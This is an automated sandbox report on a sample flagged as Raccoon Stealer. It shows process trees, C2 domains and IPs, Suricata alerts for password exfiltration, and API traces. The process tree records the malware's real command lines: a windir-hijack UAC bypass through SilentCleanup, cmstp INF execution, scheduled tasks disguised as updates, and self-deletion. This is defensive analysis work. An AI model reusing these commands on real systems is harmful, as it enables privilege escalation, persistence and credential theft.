Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 9, 2021, 9:26 a.m.	Aug. 9, 2021, 9:42 a.m.

Size	992.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`7fb10b8ea68c1e0064730018fca3cb39`
SHA256	`29cf2aec62c3504b1914484feff17ae470b51229b1df06f1a30334a08b6db12a`
CRC32	`0240B001`
ssdeep	`24576:/E0lHcgqgh7/0tgIugNw6GQlGDI/NKs/Y:/Ew8gXYzVtGQVNn/Y`
Yara	UPX_Zero - UPX packed file Raccoon_Stealer_1_Zero - Raccoon Stealer Generic_Malware_Zero - Generic Malware PE_Header_Zero - PE File Signature IsPE32 - (no description)

zxcv.EXE "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
2260
- GFDyrtucbvfdg.exe "C:\ProgramData\GFDyrtucbvfdg.exe"
  1836
  - GFDyrtucbvfdg.exe "C:\ProgramData\GFDyrtucbvfdg.exe"
    1632
- DSFnbyhgfrtydfg.exe "C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe"
  2084
  - DSFnbyhgfrtydfg.exe "C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe"
    2364
    - cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit
      2548
      - taskkill.exe taskkill /pid 2364
        2228
- zxcv.EXE "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
  1812
  - 4tWOdlbY5p.exe "C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe"
    2412
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp"
      3724
  - j6VXXENS27.exe "C:\Users\test22\AppData\Local\Temp\j6VXXENS27.exe"
    1472
    - cmd.exe cmd /c ""C:\Users\Public\Trast.bat" "
      932
      - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
        3084
        
        reg.exe reg delete hkcu\Environment /v windir /f
        3168
        
        reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
        3212
        
        schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        3256
    - cmd.exe cmd /c ""C:\Users\Public\nest.bat" "
      3512
      - reg.exe reg delete hkcu\Environment /v windir /f
        3572
  - crS9EKo8sM.exe "C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe"
    2300
    - crS9EKo8sM.exe "{path}"
      4024
      - cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\b3hfotbm.inf
        3112
  - V6QfXKl0VE.exe "C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe"
    2488
    - V6QfXKl0VE.exe "{path}"
      3180
      - powershell.exe "powershell" Get-MpPreference -verbose
        3088
  - Y9vZMbEz1g.exe "C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe"
    808
    - Y9vZMbEz1g.exe "C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe"
      3332
      - schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
        3404
  - cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
    2440
    - timeout.exe timeout /T 10 /NOBREAK
      1756
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
danielmi.ac.ug	A 185.215.113.77	185.215.113.77
sergio.ac.ug	A 79.134.225.25	79.134.225.25
icacxndo.ac.ug	A 194.5.98.107	194.5.98.107
parhatcsafxz.ac.ug
danielmax.ac.ug	A 185.215.113.77	185.215.113.77
ramosasdj.ac.ug
telete.in	A 195.201.225.248	195.201.225.248
aertdfvaz.ac.ug
heartdoaz.ac.ug
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.135.233

IP Address	Status	Action
162.159.134.233	Active	Moloch
164.124.101.2	Active	Moloch
185.215.113.77	Active	Moloch
194.5.98.107	Active	Moloch
195.201.225.248	Active	Moloch
74.119.195.134	Active	Moloch
79.134.225.25	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49209 -> 195.201.225.248:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.215.113.77:80 -> 192.168.56.101:49210	2400024	ET DROP Spamhaus DROP Listed Traffic Inbound group 25	Misc Attack
TCP 185.215.113.77:80 -> 192.168.56.101:49211	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 74.119.195.134:80 -> 192.168.56.101:49213	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 74.119.195.134:80 -> 192.168.56.101:49213	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 74.119.195.134:80 -> 192.168.56.101:49213	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49305 -> 162.159.134.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49315 -> 162.159.134.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49296 -> 185.215.113.77:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49296 -> 185.215.113.77:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49296	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49296	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49296	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49296 -> 185.215.113.77:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49296 -> 185.215.113.77:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49296	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49296	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49211 -> 185.215.113.77:80	2027108	ET HUNTING Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2	A Network Trojan was detected
TCP 192.168.56.101:49211 -> 185.215.113.77:80	2029236	ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 185.215.113.77:80	2029846	ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)	A Network Trojan was detected
TCP 192.168.56.101:49314 -> 162.159.134.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49296 -> 185.215.113.77:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49296 -> 185.215.113.77:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49296 -> 185.215.113.77:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49296 -> 185.215.113.77:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49296 -> 185.215.113.77:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49296 -> 185.215.113.77:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49304 -> 162.159.134.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49209 195.201.225.248:443	C=US, O=Let's Encrypt, CN=R3	CN=telecut.in	1d:7b:94:0d:d6:f9:85:f3:66:74:d5:1d:98:0c:7a:28:5b:c0:62:44
TLSv1 192.168.56.101:49305 162.159.134.233:443	None	None	None
TLSv1 192.168.56.101:49315 162.159.134.233:443	None	None	None
TLSv1 192.168.56.101:49314 162.159.134.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.101:49304 162.159.134.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

Queries for the computername (22 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2021, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2021, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2021, 9:41 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (11 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0
IsDebuggerPresent Aug. 9, 2021, 9:41 a.m.			0	0

Command line console output was observed (30 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 9, 2021, 9:26 a.m.	buffer: C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:26 a.m.	buffer: Access is denied. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 9, 2021, 9:26 a.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 9, 2021, 9:26 a.m.	buffer: ERROR: The process "2364" not found. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\zxcv.EXE console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: Access is denied. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: /min C:\Users\Public\UKO.bat console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: /min reg delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 9, 2021, 9:41 a.m.	buffer: SUCCESS: The scheduled task "Updates\dCtjCu" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b83b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b86f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b86f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b86f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8978 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2021, 9:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b8ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\libegl.dll
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 9, 2021, 9:27 a.m.		1	1	0

One or more processes crashed (50 out of 2595 events)

Time & API	Arguments	Status
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x189d exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6301 exception.address: 0x40189d registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x189e exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6302 exception.address: 0x40189e registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x189f exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6303 exception.address: 0x40189f registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
